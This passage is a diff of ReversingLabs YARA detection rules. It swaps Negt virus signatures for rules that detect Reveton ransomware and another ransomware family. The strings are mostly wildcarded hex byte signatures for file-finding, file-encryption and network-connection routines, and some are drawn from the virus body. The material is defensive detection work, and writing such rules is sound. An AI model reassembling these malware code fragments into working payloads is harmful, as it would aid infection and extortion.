+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 55 ?? 03 CA 89 85 ?? ?? ?? ??
+            83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83
+            7F ?? ?? 72 ?? 8B 3F 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
+            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
+            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 83 7D ?? ?? 8D 4D ?? 66 89 85 ?? ?? ?? ?? 0F 43 4D ?? 8B 45 ?? 03 C1 C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B F0 83 7E ?? ?? 72 ?? 8B 36 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
+            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 50 6A ?? 68 ?? ?? ?? ?? 57 8B 3D ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? FF D7 89 85 ?? ?? ?? ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF
+            D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C9 BA
+        }
+		$encrypt_files_p2 = {
+            8D 40 ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ??
+            ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 03 CA 89 85 ?? ?? ?? ?? 83 3D ?? ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 51 50 8B CE E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 83 C4 ?? 33 C9 68 ?? ?? ?? ?? 6A ?? 56 66 89 0C 46 8D 85 ?? ?? ??
+            ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 86 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
+            8D 45 ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF 33 F6 57 FF B5 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$encrypt_files_p3 = {
+            8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F8 8D 85 ?? ?? ?? ?? 3B
+            BD ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 0F 44 F1 50 6A ?? 56 6A ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
+            5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 33 C0 89
+            85 ?? ?? ?? ?? 38 47 ?? 0F 85 ?? ?? ?? ?? 8B 07 8B 08 8D 85 ?? ?? ?? ?? 50 8D 49 ??
+            E8 ?? ?? ?? ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 8B 07 8B 08 8D 85 ?? ??
+            ?? ?? 50 8D 49 ?? E8 ?? ?? ?? ?? 83 38 ?? 0F 84 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ??
+            8B 30 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 46 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
+            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
+            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 07 8B
+            30 8B 46 ?? 8B 00 85 C0 74 ?? 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 83 C4 ?? 66 83 38 ?? 75 ?? 8B 46 ?? FF 30 FF 15 ?? ?? ?? ?? 8B 46 ?? 83 C4
+            ?? C7 00 ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
+            4E ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 81 7F ?? ?? ?? ?? ?? 8B 37 8B 36 75 ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 8B 46 ?? 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D 4F ?? 50 E8
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $mocket_body_1 at pe.entry_point ) and $mocket_body_2 and $mocket_body_3
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Negt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Reveton : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Negt virus."
+		description = "Yara rule that detects Reveton ransomware."
 		author = "ReversingLabs"
-		id = "80e83105-dd98-5fad-9119-f851ec3199af"
+		id = "14446b94-cd57-5930-b0af-b21091b61f68"
 		date = "2020-06-26"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Negt.yara#L3-L94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Reveton.yara#L1-L118"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "43057ef111fc505678606386c8d428653da391f4b65844d81479ca05e3517346"
+		logic_hash = "2d316c558cdb5591788ef89c6e20327882a118f2928f4a31fb5b8b3083931ac5"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Negt"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Reveton"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$negt_body_and_infector_1 = {
-            6A 00 E8 99 08 00 00 A3 ?? ?? ?? ?? 68 04 01 00 00 68 ?? ?? ?? ?? 6A 00 E8 7D 08 00 00 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 48 08 00 00 BB 00 00 00 00 8D 05 ?? ?? ?? ?? FE 00 68 ?? ?? ?? ?? E8 2D 00 00 00 43 83 FB 18 7C E8 E8 92 08 00 00
-            3C 9F 7F 17 6A 01 68 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 6A 00 6A 00 E8 7D 08 00 00 6A 00 E8 10 08 00 00 55 8B EC 81 C4 B8
-            FD FF FF FF 75 08 E8 35 08 00 00 0B C0 0F 84 C2 00 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 F2 07 00 00 89 85 BC FE
-            FF FF 83 BD BC FE FF FF FF 0F 84 9E 00 00 00 8D 9D EE FE FF FF 53 E8 21 08 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ??
-            ?? 56 E8 01 08 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 F4 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 E7 07 00 00 23 D8 68 ?? ?? ?? ??
-            56 E8 DA 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 CD 07 00 00 23 D8 83 FB 00 74 28 FF 75 08 68 ?? ?? ?? ?? E8 BF 07 00 00 8D
-            85 EE FE FF FF 50 68 ?? ?? ?? ?? E8 A2 07 00 00 68 ?? ?? ?? ?? E8 08 01 00 00 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8
-            50 07 00 00 83 F8 00 0F 85 62 FF FF FF FF B5 BC FE FF FF E8 30 07 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 25 07 00
-            00 89 85 BC FE FF FF 83 BD BC FE FF FF FF 0F 84 AF 00 00 00 8D BD C2 FE FF FF 8B 07 66 83 E0 10 0F 84 82 00 00 00 8D 9D
+		$http_connection_1 = {
+            C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 E8 ?? ?? ?? ?? 50 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 06 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? 8B 45 ?? 50 53 E8 ?? ?? ?? ?? 8B 55 ?? 8B 06 8B 4D ?? E8 ?? ?? ?? ?? 83
+            7D ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
         }
-		$negt_body_and_infector_2 = {
-            EE FE FF FF 53 E8 42 07 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? ?? 56 E8 22 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 15
-            07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 08 07 00 00 23 D8 83 FB 00 74 41 FF 75 08 8D 85 B8 FD FF FF 50 E8 F8 06 00 00 8D 85
-            EE FE FF FF 50 8D 85 B8 FD FF FF 50 E8 D9 06 00 00 68 ?? ?? ?? ?? 8D 85 B8 FD FF FF 50 E8 C8 06 00 00 60 8D 85 B8 FD FF
-            FF 50 E8 63 FE FF FF 61 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 72 06 00 00 83 F8 00 0F 85 51 FF FF FF FF B5 BC FE FF
-            FF E8 52 06 00 00 C9 C2 04 00 55 8B EC 81 C4 E4 E9 FF FF 51 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 68 00 00 00 C0 FF 75
-            08 E8 1E 06 00 00 83 F8 FF 75 05 E9 AE 03 00 00 89 45 FC 6A 00 6A 00 6A 3C FF 75 FC E8 45 06 00 00 6A 00 8D 45 F0 50 6A
-            04 8D 45 F4 50 FF 75 FC E8 25 06 00 00 6A 00 6A 00 FF 75 F4 FF 75 FC E8 22 06 00 00 6A 00 8D 45 F0 50 68 20 01 00 00 68
-            ?? ?? ?? ?? FF 75 FC E8 FE 05 00 00 8B 5D F4 83 EB 0B 6A 00 6A 00 53 FF 75 FC E8 F7 05 00 00 6A 00 8D 45 F0 50 6A 0B 68
-            ?? ?? ?? ?? FF 75 FC E8 D6 05 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 E5 05 00 00 0B C0 75 05 E9 12 03 00 00 81 3D ?? ??
-            ?? ?? 50 45 00 00 74 05 E9 01 03 00 00 0F B7 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 03 45 F4 83 C0 18 0F B7 0D ?? ?? ?? ??
-            03 C1 83 C0 28 3B 05 ?? ?? ?? ?? 76 05 E9 D4 02 00 00 A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 0F B7
+		$raw_socket_connection_1_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D
+            ?? 89 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CF E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
         }
-		$negt_body_and_infector_3 = {
-            05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 83 C0 04 03 45 F4 83 C0 14 05 E0 00 00 00 89 45 EC C7 05 ?? ?? ?? ?? 2E 45 41 54 C7
-            05 ?? ?? ?? ?? 55 02 00 00 FF 35 ?? ?? ?? ?? 8F 05 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 A3 ??
-            ?? ?? ?? 8B 45 EC 83 E8 18 6A 00 6A 00 50 FF 75 FC E8 10 05 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E8 50 FF 75 FC E8 F0 04
-            00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E4 50 FF 75 FC E8 DC 04 00 00 8B 45 E8 03 45 E4 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00
-            00 00 00 C7 05 ?? ?? ?? ?? 00 00 00 00 66 C7 05 ?? ?? ?? ?? 00 00 66 C7 05 ?? ?? ?? ?? 00 00 C7 05 ?? ?? ?? ?? 20 00 00
-            E0 6A 00 6A 00 FF 75 EC FF 75 FC E8 9E 04 00 00 6A 00 8D 45 F0 50 6A 28 68 ?? ?? ?? ?? FF 75 FC E8 8F 04 00 00 68 ?? ??
-            ?? ?? E8 61 04 00 00 68 ?? ?? ?? ?? E8 63 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 48 04 00 00 A3 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 33 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 1E 04 00 00
-            A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 09 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 F4 03
-            00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 DF 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-            CA 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 B5 03 00 00 A3 ?? ?? ?? ?? 6A 02 6A 00 6A 00 FF 75 FC E8
-            BA 03 00 00 6A 00 8D 45 F0 50 FF 35 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 50 FF 75 FC E8 A5 03 00 00 66 FF 05 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 03 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A 00 6A 00
+		$raw_socket_connection_1_2 = {
+            C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 80 BD ?? ?? ??
+            ?? ?? 74 ?? 33 C0 EB ?? B0 ?? 84 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 74 ?? 2C ?? 74
+            ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ??
+            ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 95
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? E8
         }
-		$negt_body_and_infector_4 = {
-            FF 75 F4 FF 75 FC E8 63 03 00 00 6A 00 8D 45 F0 50 68 F8 00 00 00 68 ?? ?? ?? ?? FF 75 FC E8 51 03 00 00 83 6D F4 0B 6A
-            00 6A 00 FF 75 F4 FF 75 FC E8 38 03 00 00 6A 00 8D 45 F0 50 6A 0B 68 ?? ?? ?? ?? FF 75 FC E8 29 03 00 00 6A 00 6A 20 6A
-            03 6A 00 6A 01 68 00 00 00 80 68 ?? ?? ?? ?? E8 C8 02 00 00 89 45 F8 6A 00 6A 00 6A 00 FF 75 F8 E8 F9 02 00 00 6A 00 8D
-            45 F0 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 F8 E8 D3 02 00 00 8B 75 F0 6A 02 6A 00 6A 00 FF 75 FC E8 CE 02 00 00
-            6A 00 8D 45 F0 50 56 8D 85 ?? ?? ?? ?? 50 FF 75 FC E8 BE 02 00 00 FF 75 FC E8 62 02 00 00 FF 75 F8 E8 5A 02 00 00 59 C9
-            C2 04 00 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00
-            FF 95 ?? ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A
-            00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ??
-            ?? FF 95 ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00
-            01 00 00 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00
-            50 53 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+		$raw_socket_connection_1_3 = {
+            66 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F B6 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CF
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85
+            C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 40 ?? 8B 00 8B 00
+            89 85 ?? ?? ?? ?? 8A 94 3D ?? ?? ?? ?? 8A 84 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85
+            ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? E8
         }
-		$negt_infector = {
-            E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 FF 95 ??
-            ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 6A 20
-            6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? ?? FF 95
-            ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 01 00 00
-            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 50 53 FF
-            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ??
-            ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+		$raw_socket_connection_1_4 = {
+            8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B
+            00 50 E8 ?? ?? ?? ?? 40 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? 8B 00
+            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B 00 50 E8
+        }
+		$raw_socket_connection_1_5 = {
